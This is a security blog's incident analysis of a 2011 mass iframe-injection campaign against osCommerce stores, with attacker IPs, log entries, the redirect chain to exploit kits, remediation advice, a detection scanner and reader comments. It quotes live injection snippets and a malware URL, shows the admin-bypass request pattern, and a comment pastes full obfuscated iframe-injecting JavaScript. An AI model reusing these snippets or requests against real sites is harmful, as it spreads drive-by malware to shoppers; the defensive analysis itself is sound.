(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots
[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.
2. Injected iframe:
initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>
3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.
5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 -- PDF LibTiff
CVE-2010-0886 -- Java SMB
CVE-2006-0003 -- IE MDAC
CVE-2010-1885 -- HCP
6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukraine - Inet Ltd)
Related domains: xlamv.ru, vntum.ru
7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. Attack Timeline]
July 10th -- "Angel Injection" writes about the "osCommerce Remote Edit Site Info Vulnerability" (here, here).
July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com
July 23rd -- Attack launched; it injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
and later:
<script src=http://exero.eu/catalog/jquery.js></script>
July 24th -- Initial writeup of this report; at the time there were only 90,000 infected pages:
July 31st -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:
Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages
Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.
[3. Source of Attack]
Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs appear to be located in Ukraine and belong to the ISP www.didan.com.ua.
The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.
[4. Vulnerabilities Targeted]
This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including: osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011; osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011; and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.
Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
[5. What Happens to Affected Websites]
1. The "Store Name" variable of osCommerce sites will be modified to inject one of the iframes below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. For certain websites the attacker also leaves at least one (sometimes more) backdoors, or "webshells". This happens especially on shared hosting accounts, where the backdoor allows access to multiple accounts on the same server:
[6. Remediation]
Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.
1. Know if you've been infected.
1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 Search your site for the existence of two iframes:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)
2. Install an anti-virus program on the computer you use to manage your website.
3. Find and remove the injected backdoors.
4. Find and remove the injected iframes / javascripts
5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.
6. Change your website hosting and your osCommerce admin passwords
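As an added example (not code from this post or from Armorize), the Python scanner below applies the checks from steps 1.1 and 1.2 to Apache combined-format log lines and to page or configuration text: it flags the listed source IPs and agent string, the /admin/<script>.php/<script>.php PATH_INFO request shape visible in the log entries of section 4, a POST with action=save answered by a 302, and the two injected snippets. The hidden-iframe pattern is our generalisation of the willysy.com iframe style, and the 203.0.113.7 log line is a constructed benign request.

```python
import re
# Indicators published in the post above.
ATTACKER_IPS = {"178.217.163.33", "178.217.165.111", "178.217.165.71", "178.217.163.214"}
ATTACKER_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; "
               ".NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)")
INJECTED_MARKERS = ("willysy.com/images/banners/", "exero.eu/catalog/jquery.js")

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
# Admin script reached through a trailing PATH_INFO component (/admin/configuration.php/login.php).
PATHINFO_RE = re.compile(r"^/admin/[^?]*\.php/[^?]*\.php")
# Our generalisation, not from the post: any iframe styled invisible.
HIDDEN_IFRAME_RE = re.compile(r"<iframe[^>]*visibility\s*:\s*hidden", re.I)

def classify_request(line):
    """Reasons a log line is suspicious: [] if none, None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, method, path, status, agent = m.groups()
    reasons = []
    if ip in ATTACKER_IPS:
        reasons.append("known attacker IP")
    if agent == ATTACKER_UA:
        reasons.append("attacker user agent")
    if PATHINFO_RE.match(path):
        reasons.append("admin PATH_INFO bypass")
    if method == "POST" and "action=save" in path and status == "302":
        reasons.append("configuration write via admin")
    return reasons

def scan_log(lines):
    """(ip, path, reasons) for every line that trips at least one check."""
    hits = []
    for line in lines:
        reasons = classify_request(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group(1), m.group(4), reasons))
    return hits

def find_injection(text):
    """Known injected markers plus any hidden iframe in page or config text."""
    found = [mk for mk in INJECTED_MARKERS if mk in text]
    if HIDDEN_IFRAME_RE.search(text):
        found.append("hidden iframe")
    return found

# Two log lines from the post (referer masked by Armorize) and one constructed benign request.
SAMPLE_LOG = [
    '178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "%s"' % ATTACKER_UA,
    '178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "%s"' % ATTACKER_UA,
    '203.0.113.7 - - [23/Jul/2011:14:02:11 -0500] "GET /catalog/index.php HTTP/1.1" 200 11212 "-" "Mozilla/5.0"',
]
```

Run find_injection over the STORE_NAME value in the configuration table as well as over rendered pages, since that is where the post says the snippet is written.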
A very good article on how to secure osCommerce can be found here (thanks Markus):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
And the latest version of osCommerce can be downloaded here:
http://www.oscommerce.com/solutions/downloads
[7. Infection Details]
Here's the original YouTube video we made of the entire infection process; at the time there were only 90,000 infected pages.
And here's the new one we made when there were over 6 million infected pages:
1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. The browser loads http://willysy.com/images/banners/ and is redirected (302) to http://papucky.eu/ext/
3. The contents of papucky.eu/ext/ are here on pastebin; it loads JavaScript from http://gooqlepics.com/include.js?in=864
4. The JavaScript is here on pastebin and decodes to this; it generates an iframe pointing to:
http://yandekapi.com/api?in=864
5. The contents of http://yandekapi.com/api?in=864 are here; it redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. The contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV are here and decode to this. This includes multiple browser exploits.
7. After successful exploitation, the browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. Screenshots]
Vulnerable osCommerce installations allow modification of the site's variables without admin access:
The infection attempt, when not successful, has the injected iframe rendered as content (rather than executed) in the title part of the website. Below are some examples:
49 comments:
Thank you very much for your information.
How do I fix this malware?
I have found some unusual *.php files in catalog/image and deleted them all.
But it still keeps changing my store name.
Sorry for the trivial question.
What is the process monitor used in the screencast ?
With the Sysinternals one or with Yet Another (remote) I was not able to get this interesting window.
When I click this pastebin : http://pastebin.com/jAPCwSz8 ESET moans at me. Will the code contained in this pastebin execute just by clicking on the link? I wanted to see exactly what it does but I don't wanna get infected.
@Kafeine the process monitor is called process monitor. The title bar of the application gives it away.
Usually the titlebar of an application will tell you exactly what the app is.
@Kafeine The shortcut on the desktop is also an indication of what the program is called. It's literally called "process monitor."
Where did you find this Process Monitor?
If you look for it you only find the Sysinternals one and Yet Another Remote Process Monitor (whose icon is not far from this one).
Thank you for sharing your observations!
I am sorry for the potentially dumb question but... do you have details on the infection process on the server side? How was the iframe injected on the website?
My website is affected too. How to resolve this problem?
It looks like they somehow get access to database (most probably through the admin page) and modify the STORE_NAME key in configuration table. Remove the iframe code from the value and it's fixed.
Hi Henry, I kept removing that but the store name keeps changing. No matter how many times I change my password....:-(
@Kafeine about the Process Monitor, look here:
http://www.brothersoft.com/process-monitor-163749.html
Many Thanks ! :)
Cleaner Link.
It's from BlueOrb
http://www.blueorbsoft.com/ProcessMonitor/index.html
In reference to removing iframe code from the STORE_NAME configuration value: if you remove the code and it's coming back, this could mean you're under active attack. I also noticed I had a few strange administrator accounts that I know I didn't set up. Naturally I removed them.
I suspect the attack somehow happens through the admin page, so I blocked access to the admin page entirely, with the exception of specific IP addresses. This can be done with an htaccess file inside the admin directory. For example, adding the lines below to the htaccess file will block all access except from a specific IP address (this would be your IP; this also supports multiple "Allow from" definitions if you access the admin page from more than one location, like home and office).
Order deny,allow
Deny from all
Allow from YOUR_IP
This however will not work well when your IP address changes often but it's better than getting hacked. The best fix is probably to upgrade to the latest osCommerce release but it's not so easy in my case as I made tons of changes to original code to support what I needed. Take a look if interested
(podatekdochodowy.com or amigolife.com)
Cool sites. Looks like you have put a lot of effort into it
A simple question, how are these websites injected with this malicious code?
what does the update.exe do?
Hi henry, thanks for your suggestion. Have put in place a security check, hopefully it works...
And for those who use GNU/Linux, is it secure? Or does it only affect the Windows platform?
greetings to all.
Alessandro simon.
Hi guys, there's been more than 1 million infected pages by now, and so we've updated the original post, adding to it the infection number (1,273,000), source IP of attack, log entries, osCommerce vulnerabilities used, and more. Thanks!
Good write up on this ongoing exploit. One thing though - if you are going to mask a URL in a screenshot - mask it in the browser tab too.
;-)
@Chris: it's nice that you grey out the URLs in your browser screenshots, but please grey out the URL in browser tab also ;) (have a look at your Chrome screenshot with file manager)
@Chris: also in your screenshot of vintagesleazes.com's admin panel of osCommerce. There is a mail address shown in screenshot. So it's not difficult to guess the shops URL. Please grey it out ;)
LOL. You forgot to anon the tab with the sites name in point 5.
New suspicious URL
hxxp://tiasissi[.]com[.]br/revendedores/jquery/>
Thanks for a great post.
I have a few follow up questions.
How does the virus find the osCommerce sites?
We have a lot of hackers coming back trying the same non-existent file in the admin folder. But it seems to be machines, not real hackers. Maybe infected computers or servers. Is this the virus trying to find more osCommerce sites?
Thanks and keep up the good work!
The biggest problem we face is that companies want to run e-commerce sites on a shoestring. When we mention backups and updates they do not seem to care.
Slowly the more attacks that get highlighted the more people will listen.
This blog is excellent. Keep up the good work.
They're now obfuscating the code. Our website was just hit, and they appended this:
["script" tag here, removed as it was rejected by this comment box]ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);[end /script tag]
["script" tag here, removed as it was rejected by this comment box]wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);[end /script tag]
Which expands to http://zirycatum.com/k985ytv.htm
( zirycatum.com resolves to 178.17.163.92 )
Thanks! The incident involving that k985ytv.htm URL is documented here: http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html
3 different break-in attempts on my OSCommerce site (unsuccessful on my site, however) from other IPs than those listed above:
174.143.11.196
31.41.10.135
178.217.160.133
Thank you Chameleon!
Yes, there are several crawlers crawling for osCommerce sites on a regular basis. A fat list of known osCommerce sites can be downloaded easily and has been updated regularly. There's also an osCommerce defacer that takes this list as input and starts to deface osCommerce sites.
Thank you will correct it
Ha!
The malware infects only Windows machines. The injection will work on osCommerce installations regardless of the underlying operating system.
By leveraging osCommerce vulnerabilities mentioned in the post.
Indeed not easy to upgrade, and thanks for the info!
Yes this is the one. Simpler than the Process Monitor from SysInternals (MS) and therefore makes a better demo.
Best is to upgrade your osCommerce to the latest version
No, you won't get infected by visiting http://pastebin.com/jAPCwSz8
Many antivirus just do simple regex and therefore...
Best that you upgrade to the latest version of osCommerce.
awesome share. thank you very much.
The best fix I have found so far is with the addon called osC_Sec
http://addons.oscommerce.com/info/7834
http://vintagesleaze.com/admin/configuration.php
is still vulnerable!!!!!!
Hi, we're running OsCom 2.2 on a Windows IIS server.... and have been attacked several times in the last 2 months... Any recommendation?? orientation??
thanks
Rodigo
This is a brilliant post, I'm really glad I found it, thank you very much.
Very interesting article. I've always been interested in knowing more about this.
is still vulnerable!!!!!!